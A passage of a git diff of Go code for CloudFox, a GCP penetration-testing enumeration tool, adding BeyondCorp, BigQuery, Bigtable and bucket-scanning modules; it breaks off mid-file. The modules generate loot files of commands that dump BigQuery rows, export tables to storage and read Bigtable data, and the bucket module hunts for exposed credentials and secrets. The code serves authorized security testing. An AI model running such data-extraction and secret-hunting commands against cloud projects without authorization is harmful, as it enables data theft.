+var GCPBeyondCorpCommand = &cobra.Command{ + Use: globals.GCP_BEYONDCORP_MODULE_NAME, + Aliases: []string{"bc", "zero-trust"}, + Short: "Enumerate BeyondCorp Enterprise configurations", + Long: `Enumerate BeyondCorp Enterprise configurations. + +Features: +- Lists app connectors and connections +- Analyzes connection endpoints +- Identifies configuration issues`, + Run: runGCPBeyondCorpCommand, +} + +type BeyondCorpModule struct { + gcpinternal.BaseGCPModule + AppConnectors []beyondcorpservice.AppConnectorInfo + AppConnections []beyondcorpservice.AppConnectionInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type BeyondCorpOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BeyondCorpOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BeyondCorpOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBeyondCorpCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BEYONDCORP_MODULE_NAME) + if err != nil { + return + } + + module := &BeyondCorpModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + AppConnectors: []beyondcorpservice.AppConnectorInfo{}, + AppConnections: []beyondcorpservice.AppConnectionInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BeyondCorpModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BEYONDCORP_MODULE_NAME, m.processProject) + + totalCount := len(m.AppConnectors) + len(m.AppConnections) + if totalCount == 0 { + logger.InfoM("No BeyondCorp resources found", globals.GCP_BEYONDCORP_MODULE_NAME) + return + } + + // Count public resources + publicConnectorCount := 0 + publicConnectionCount := 0 + for _, connector := range m.AppConnectors { + if connector.PublicAccess { + publicConnectorCount++ + } + } + for _, conn := range m.AppConnections { + if conn.PublicAccess { + publicConnectionCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d connector(s), %d connection(s)", + len(m.AppConnectors), len(m.AppConnections)), + globals.GCP_BEYONDCORP_MODULE_NAME) + + if publicConnectorCount > 0 || publicConnectionCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d public connector(s), %d public connection(s)!", + publicConnectorCount, publicConnectionCount), globals.GCP_BEYONDCORP_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *BeyondCorpModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating BeyondCorp in project: %s", projectID), globals.GCP_BEYONDCORP_MODULE_NAME) + } + + svc := beyondcorpservice.New() + + // Get app connectors + connectors, _ := svc.ListAppConnectors(projectID) + m.mu.Lock() + m.AppConnectors = append(m.AppConnectors, connectors...) + m.mu.Unlock() + + // Get app connections + connections, _ := svc.ListAppConnections(projectID) + m.mu.Lock() + m.AppConnections = append(m.AppConnections, connections...) + m.mu.Unlock() + + m.mu.Lock() + for _, conn := range connections { + m.addConnectionToLoot(conn) + } + m.mu.Unlock() +} + +func (m *BeyondCorpModule) initializeLootFiles() { + m.LootMap["beyondcorp-details"] = &internal.LootFile{ + Name: "beyondcorp-details", + Contents: "# BeyondCorp Details\n# Generated by CloudFox\n\n", + } +} + +func (m *BeyondCorpModule) addConnectionToLoot(conn beyondcorpservice.AppConnectionInfo) { + m.LootMap["beyondcorp-details"].Contents += fmt.Sprintf( + "# Connection: %s\n# Endpoint: %s\n# Gateway: %s\n# Connectors: %s\n", + conn.Name, conn.ApplicationEndpoint, conn.Gateway, strings.Join(conn.Connectors, ", ")) + + if conn.ApplicationEndpoint != "" { + m.LootMap["beyondcorp-details"].Contents += fmt.Sprintf("# Application Endpoint: %s\n", conn.ApplicationEndpoint) + } + m.LootMap["beyondcorp-details"].Contents += "\n" +} + +func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // App Connectors table (one row per IAM binding member) + if len(m.AppConnectors) > 0 { + header := []string{"Project Name", "Project ID", "Name", "Location", "State", "Service Account", "Role", "Member", "Public"} + var body [][]string + for _, connector := range m.AppConnectors { + publicAccess := "No" + if connector.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the connector + if len(connector.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(connector.ProjectID), + connector.ProjectID, + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range connector.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(connector.ProjectID), + connector.ProjectID, + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + tables = append(tables, internal.TableFile{ + Name: "beyondcorp-connectors", + Header: header, + Body: body, + }) + } + + // App Connections table (one row per IAM binding member) + if len(m.AppConnections) > 0 { + header := []string{"Project Name", "Project ID", "Name", "Location", "State", "Endpoint", "Gateway", "Role", "Member", "Public"} + var body [][]string + for _, conn := range m.AppConnections { + publicAccess := "No" + if conn.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the connection + if len(conn.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.ProjectID, + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range conn.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.ProjectID, + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + tables = append(tables, internal.TableFile{ + Name: "beyondcorp-connections", + Header: header, + Body: body, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := BeyondCorpOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BEYONDCORP_MODULE_NAME) + } +} diff --git a/gcp/commands/bigquery.go b/gcp/commands/bigquery.go index 01b67fd7..c5cf3dfc 100644 --- a/gcp/commands/bigquery.go +++ b/gcp/commands/bigquery.go @@ -1,134 +1,373 @@ package commands import ( + "context" "fmt" - "time" + "strings" + "sync" BigQueryService "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) var GCPBigQueryCommand = &cobra.Command{ - Use: "bigquery", - Aliases: []string{}, - Short: "Display Bigquery datasets and tables information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available Bigquery datasets and tables resource information: -cloudfox gcp bigquery`, - Run: runGCPBigQueryCommand, -} + Use: globals.GCP_BIGQUERY_MODULE_NAME, + Aliases: []string{"bq"}, + Short: "Enumerate GCP BigQuery datasets and tables with security analysis", + Long: `Enumerate GCP BigQuery datasets and tables across projects with security-focused analysis. -// GCPBigQueryResults struct that implements the internal.OutputInterface -type GCPBigQueryResults struct { - DatasetsData []BigQueryService.BigqueryDataset - TablesData []BigQueryService.BigqueryTable +Features: +- Lists all BigQuery datasets with security-relevant columns +- Shows tables within each dataset with encryption and type info +- Enumerates dataset access control entries (IAM-like) +- Identifies publicly accessible datasets (allUsers/allAuthenticatedUsers) +- Shows encryption status (Google-managed vs CMEK) +- Generates bq commands for data enumeration +- Generates exploitation commands for data access`, + Run: runGCPBigQueryCommand, } -// Define the format for CSV & JSON output -func (g GCPBigQueryResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type BigQueryModule struct { + gcpinternal.BaseGCPModule - // For Datasets - datasetHeader := []string{"Name", "DatasetID", "Description", "CreationTime", "LastModifiedTime", "Location", "ProjectID"} - var datasetBody [][]string - for _, dataset := range g.DatasetsData { - datasetBody = append(datasetBody, []string{ - dataset.Name, - dataset.DatasetID, - dataset.Description, - dataset.CreationTime.Format(time.RFC3339), - dataset.LastModifiedTime.Format(time.RFC3339), - dataset.Location, - dataset.ProjectID, - }) - } - datasetTableFile := internal.TableFile{ - Header: datasetHeader, - Body: datasetBody, - Name: "bigquery-datasets", - } - tableFiles = append(tableFiles, datasetTableFile) - - // For Tables - tableHeader := []string{"TableID", "DatasetID", "Description", "CreationTime", "LastModifiedTime", "NumBytes", "Location", "ProjectID"} - var tableBody [][]string - for _, table := range g.TablesData { - tableBody = append(tableBody, []string{ - table.TableID, - table.DatasetID, - table.Description, - table.CreationTime.Format(time.RFC3339), - table.LastModifiedTime.Format(time.RFC3339), - fmt.Sprintf("%d", table.NumBytes), - table.Location, - table.ProjectID, - }) - } - tableTableFile := internal.TableFile{ - Header: tableHeader, - Body: tableBody, - Name: "bigquery-tables", - } - tableFiles = append(tableFiles, tableTableFile) - - return tableFiles + // Module-specific fields + Datasets []BigQueryService.BigqueryDataset + Tables []BigQueryService.BigqueryTable + LootMap map[string]*internal.LootFile + mu sync.Mutex } -func (g GCPBigQueryResults) LootFiles() []internal.LootFile { - // Implement if there's specific data considered as loot - return []internal.LootFile{} +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type BigQueryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile } +func (o BigQueryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigQueryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ func runGCPBigQueryCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_BIGQUERY_MODULE_NAME) + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGQUERY_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &BigQueryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Datasets: []BigQueryService.BigqueryDataset{}, + Tables: []BigQueryService.BigqueryTable{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BigQueryModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGQUERY_MODULE_NAME, m.processProject) + + // Check results + if len(m.Datasets) == 0 && len(m.Tables) == 0 { + logger.InfoM("No BigQuery datasets found", globals.GCP_BIGQUERY_MODULE_NAME) return } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_BIGQUERY_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d dataset(s) with %d table(s)", len(m.Datasets), len(m.Tables)), globals.GCP_BIGQUERY_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *BigQueryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating BigQuery in project: %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) } + // Create service and fetch data bqService := BigQueryService.New() - var datasetsResults []BigQueryService.BigqueryDataset - var tablesResults []BigQueryService.BigqueryTable - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving BigQuery datasets and tables from project: %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) - result, err := bqService.BigqueryDatasetsAndTables(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BIGQUERY_MODULE_NAME) - return + result, err := bqService.BigqueryDatasetsAndTables(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGQUERY_MODULE_NAME, + fmt.Sprintf("Could not enumerate BigQuery in project %s", projectID)) + return + } + + // Thread-safe append + m.mu.Lock() + m.Datasets = append(m.Datasets, result.Datasets...) + m.Tables = append(m.Tables, result.Tables...) + + // Generate loot for each dataset and table + for _, dataset := range result.Datasets { + m.addDatasetToLoot(dataset) + } + for _, table := range result.Tables { + m.addTableToLoot(table) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d dataset(s) and %d table(s) in project %s", len(result.Datasets), len(result.Tables), projectID), globals.GCP_BIGQUERY_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BigQueryModule) initializeLootFiles() { + m.LootMap["bigquery-commands"] = &internal.LootFile{ + Name: "bigquery-commands", + Contents: "# GCP BigQuery Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *BigQueryModule) addDatasetToLoot(dataset BigQueryService.BigqueryDataset) { + // All commands for this dataset + m.LootMap["bigquery-commands"].Contents += fmt.Sprintf( + "## Dataset: %s (Project: %s, Location: %s)\n"+ + "# Show dataset info\n"+ + "bq show --project_id=%s %s\n"+ + "bq show --format=prettyjson %s:%s\n\n"+ + "# List tables in dataset\n"+ + "bq ls --project_id=%s %s\n\n", + dataset.DatasetID, dataset.ProjectID, dataset.Location, + dataset.ProjectID, dataset.DatasetID, + dataset.ProjectID, dataset.DatasetID, + dataset.ProjectID, dataset.DatasetID, + ) +} + +func (m *BigQueryModule) addTableToLoot(table BigQueryService.BigqueryTable) { + // Table info and query commands + m.LootMap["bigquery-commands"].Contents += fmt.Sprintf( + "## Table: %s.%s (Project: %s)\n"+ + "# Type: %s, Size: %d bytes, Rows: %d\n"+ + "# Show table schema:\n"+ + "bq show --schema --project_id=%s %s:%s.%s\n"+ + "# Query first 100 rows:\n"+ + "bq query --project_id=%s --use_legacy_sql=false 'SELECT * FROM `%s.%s.%s` LIMIT 100'\n"+ + "# Export table to GCS:\n"+ + "bq extract --project_id=%s '%s:%s.%s' gs:///export_%s_%s.json\n\n", + table.DatasetID, table.TableID, table.ProjectID, + table.TableType, table.NumBytes, table.NumRows, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, table.DatasetID, table.TableID, + ) + + // Views (may expose data from other datasets) + if table.IsView { + viewQuery := table.ViewQuery + if len(viewQuery) > 200 { + viewQuery = viewQuery[:200] + "..." + } + m.LootMap["bigquery-commands"].Contents += fmt.Sprintf( + "# VIEW DEFINITION: %s.%s\n"+ + "# Legacy SQL: %v\n"+ + "# Query:\n"+ + "# %s\n\n", + table.DatasetID, table.TableID, + table.UseLegacySQL, + strings.ReplaceAll(viewQuery, "\n", "\n# "), + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Dataset table with access columns (one row per access entry) + datasetHeader := []string{ + "Project ID", + "Project Name", + "Dataset ID", + "Location", + "Public", + "Encryption", + "Role", + "Member Type", + "Member", + } + + var datasetBody [][]string + publicCount := 0 + for _, dataset := range m.Datasets { + publicStatus := "" + if dataset.IsPublic { + publicStatus = dataset.PublicAccess + publicCount++ + } + + // One row per access entry + if len(dataset.AccessEntries) > 0 { + for _, entry := range dataset.AccessEntries { + memberType := BigQueryService.GetMemberType(entry.EntityType, entry.Entity) + role := entry.Role + // Special access types (View, Routine, Dataset) may not have explicit roles + if role == "" { + role = "READER" // Views/Routines/Datasets grant implicit read access + } + datasetBody = append(datasetBody, []string{ + dataset.ProjectID, + m.GetProjectName(dataset.ProjectID), + dataset.DatasetID, + dataset.Location, + publicStatus, + dataset.EncryptionType, + role, + memberType, + entry.Entity, + }) + } + } else { + // Dataset with no access entries + datasetBody = append(datasetBody, []string{ + dataset.ProjectID, + m.GetProjectName(dataset.ProjectID), + dataset.DatasetID, + dataset.Location, + publicStatus, + dataset.EncryptionType, + "-", + "-", + "-", + }) + } + } + + // Table table with security columns (one row per IAM binding member) + tableHeader := []string{ + "Project ID", + "Project Name", + "Dataset ID", + "Table ID", + "Type", + "Encryption", + "Rows", + "Public", + "Role", + "Member", + } + + var tableBody [][]string + publicTableCount := 0 + for _, table := range m.Tables { + publicStatus := "" + if table.IsPublic { + publicStatus = table.PublicAccess + publicTableCount++ } - datasetsResults = append(datasetsResults, result.Datasets...) - tablesResults = append(tablesResults, result.Tables...) - cloudfoxOutput := GCPBigQueryResults{DatasetsData: datasetsResults, TablesData: tablesResults} + // If no IAM bindings, still show the table + if len(table.IAMBindings) == 0 { + tableBody = append(tableBody, []string{ + table.ProjectID, + m.GetProjectName(table.ProjectID), + table.DatasetID, + table.TableID, + table.TableType, + table.EncryptionType, + fmt.Sprintf("%d", table.NumRows), + publicStatus, + "-", + "-", + }) + } else { + // One row per member per role + for _, binding := range table.IAMBindings { + for _, member := range binding.Members { + tableBody = append(tableBody, []string{ + table.ProjectID, + m.GetProjectName(table.ProjectID), + table.DatasetID, + table.TableID, + table.TableType, + table.EncryptionType, + fmt.Sprintf("%d", table.NumRows), + publicStatus, + binding.Role, + member, + }) + } + } + } + } - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_BIGQUERY_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BIGQUERY_MODULE_NAME) - return + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) + } + + // Build tables list + tables := []internal.TableFile{ + { + Name: "bigquery-datasets", + Header: datasetHeader, + Body: datasetBody, + }, + { + Name: "bigquery-tables", + Header: tableHeader, + Body: tableBody, + }, + } + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible dataset(s)!", publicCount), globals.GCP_BIGQUERY_MODULE_NAME) + } + + output := BigQueryOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGQUERY_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/bigtable.go b/gcp/commands/bigtable.go new file mode 100644 index 00000000..0c0bb9e5 --- /dev/null +++ b/gcp/commands/bigtable.go @@ -0,0 +1,287 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bigtableservice "github.com/BishopFox/cloudfox/gcp/services/bigtableService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPBigtableCommand = &cobra.Command{ + Use: globals.GCP_BIGTABLE_MODULE_NAME, + Aliases: []string{"bt"}, + Short: "Enumerate Cloud Bigtable instances and tables", + Long: `Enumerate Cloud Bigtable instances, clusters, and tables with IAM analysis. + +Features: +- Lists all Bigtable instances with instance-level IAM bindings +- Lists all tables with table-level IAM bindings +- Identifies publicly accessible instances and tables +- Shows cluster information per instance`, + Run: runGCPBigtableCommand, +} + +type BigtableModule struct { + gcpinternal.BaseGCPModule + Instances []bigtableservice.BigtableInstanceInfo + Tables []bigtableservice.BigtableTableInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type BigtableOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigtableOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigtableOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBigtableCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGTABLE_MODULE_NAME) + if err != nil { + return + } + + module := &BigtableModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []bigtableservice.BigtableInstanceInfo{}, + Tables: []bigtableservice.BigtableTableInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BigtableModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGTABLE_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 { + logger.InfoM("No Bigtable instances found", globals.GCP_BIGTABLE_MODULE_NAME) + return + } + + // Count public instances and tables + publicInstanceCount := 0 + publicTableCount := 0 + for _, instance := range m.Instances { + if instance.PublicAccess { + publicInstanceCount++ + } + } + for _, table := range m.Tables { + if table.PublicAccess { + publicTableCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d instance(s) with %d table(s)", + len(m.Instances), len(m.Tables)), globals.GCP_BIGTABLE_MODULE_NAME) + + if publicInstanceCount > 0 || publicTableCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d public instance(s), %d public table(s)!", + publicInstanceCount, publicTableCount), globals.GCP_BIGTABLE_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *BigtableModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Bigtable in project: %s", projectID), globals.GCP_BIGTABLE_MODULE_NAME) + } + + svc := bigtableservice.New() + result, err := svc.ListInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGTABLE_MODULE_NAME, + fmt.Sprintf("Could not enumerate Bigtable instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.Instances = append(m.Instances, result.Instances...) + m.Tables = append(m.Tables, result.Tables...) + for _, instance := range result.Instances { + m.addInstanceToLoot(instance) + } + for _, table := range result.Tables { + m.addTableToLoot(table) + } + m.mu.Unlock() +} + +func (m *BigtableModule) initializeLootFiles() { + m.LootMap["bigtable-commands"] = &internal.LootFile{ + Name: "bigtable-commands", + Contents: "# Bigtable Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *BigtableModule) addInstanceToLoot(instance bigtableservice.BigtableInstanceInfo) { + var clusterNames []string + for _, cluster := range instance.Clusters { + clusterNames = append(clusterNames, cluster.Name) + } + + m.LootMap["bigtable-commands"].Contents += fmt.Sprintf( + "# Instance: %s (%s)\n"+ + "# Type: %s, State: %s\n"+ + "# Clusters: %s\n"+ + "cbt -project %s -instance %s ls\n\n", + instance.Name, instance.DisplayName, + instance.Type, instance.State, + strings.Join(clusterNames, ", "), + instance.ProjectID, instance.Name, + ) +} + +func (m *BigtableModule) addTableToLoot(table bigtableservice.BigtableTableInfo) { + m.LootMap["bigtable-commands"].Contents += fmt.Sprintf( + "# Table: %s (Instance: %s)\n"+ + "cbt -project %s -instance %s read %s count=10\n\n", + table.Name, table.InstanceName, + table.ProjectID, table.InstanceName, table.Name, + ) +} + +func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Instances table (one row per IAM binding member) + instanceHeader := []string{"Project Name", "Project ID", "Instance", "Display Name", "Type", "State", "Clusters", "Role", "Member", "Public"} + + var instanceBody [][]string + for _, instance := range m.Instances { + publicAccess := "No" + if instance.PublicAccess { + publicAccess = "Yes" + } + + // Build cluster info string: "name (location)" for each cluster + var clusterDetails []string + for _, cluster := range instance.Clusters { + clusterDetails = append(clusterDetails, fmt.Sprintf("%s (%s)", cluster.Name, cluster.Location)) + } + clusters := "-" + if len(clusterDetails) > 0 { + clusters = strings.Join(clusterDetails, ", ") + } + + // If no IAM bindings, still show the instance + if len(instance.IAMBindings) == 0 { + instanceBody = append(instanceBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.DisplayName, + instance.Type, + instance.State, + clusters, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range instance.IAMBindings { + for _, member := range binding.Members { + instanceBody = append(instanceBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.DisplayName, + instance.Type, + instance.State, + clusters, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + + if len(instanceBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bigtable-instances", + Header: instanceHeader, + Body: instanceBody, + }) + } + + // Tables table (one row per IAM binding member) + tableHeader := []string{"Project Name", "Project ID", "Instance", "Table", "Role", "Member", "Public"} + + var tableBody [][]string + for _, table := range m.Tables { + publicAccess := "No" + if table.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the table + if len(table.IAMBindings) == 0 { + tableBody = append(tableBody, []string{ + m.GetProjectName(table.ProjectID), + table.ProjectID, + table.InstanceName, + table.Name, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range table.IAMBindings { + for _, member := range binding.Members { + tableBody = append(tableBody, []string{ + m.GetProjectName(table.ProjectID), + table.ProjectID, + table.InstanceName, + table.Name, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + + if len(tableBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bigtable-tables", + Header: tableHeader, + Body: tableBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := BigtableOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) +} diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go new file mode 100644 index 00000000..459383e2 --- /dev/null +++ b/gcp/commands/bucketenum.go @@ -0,0 +1,312 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bucketenumservice "github.com/BishopFox/cloudfox/gcp/services/bucketEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var ( + bucketEnumMaxObjects int +) + +var GCPBucketEnumCommand = &cobra.Command{ + Use: globals.GCP_BUCKETENUM_MODULE_NAME, + Aliases: []string{"bucket-scan", "gcs-enum", "sensitive-files"}, + Short: "Enumerate GCS buckets for sensitive files (credentials, secrets, configs)", + Long: `Enumerate GCS buckets to find potentially sensitive files. + +This module scans bucket contents for files that may contain: +- Credentials (service account keys, SSH keys, certificates) +- Secrets (environment files, API keys, tokens) +- Configuration files (may contain hardcoded secrets) +- Database backups +- Terraform state files +- Source code/git repositories + +File categories detected: +- Credential: .json keys, .pem, .key, .p12, SSH keys +- Secret: .env, passwords, API keys, tokens +- Config: YAML, properties, settings files +- Backup: SQL dumps, archives +- Source: Git repositories +- Cloud: Cloud Functions source, build artifacts + +WARNING: This may take a long time for buckets with many objects. +Use --max-objects to limit the scan.`, + Run: runGCPBucketEnumCommand, +} + +func init() { + GCPBucketEnumCommand.Flags().IntVar(&bucketEnumMaxObjects, "max-objects", 1000, "Maximum objects to scan per bucket (0 for unlimited)") +} + +type BucketEnumModule struct { + gcpinternal.BaseGCPModule + SensitiveFiles []bucketenumservice.SensitiveFileInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type BucketEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BucketEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BucketEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBucketEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BUCKETENUM_MODULE_NAME) + if err != nil { + return + } + + module := &BucketEnumModule{ + BaseGCPModule: 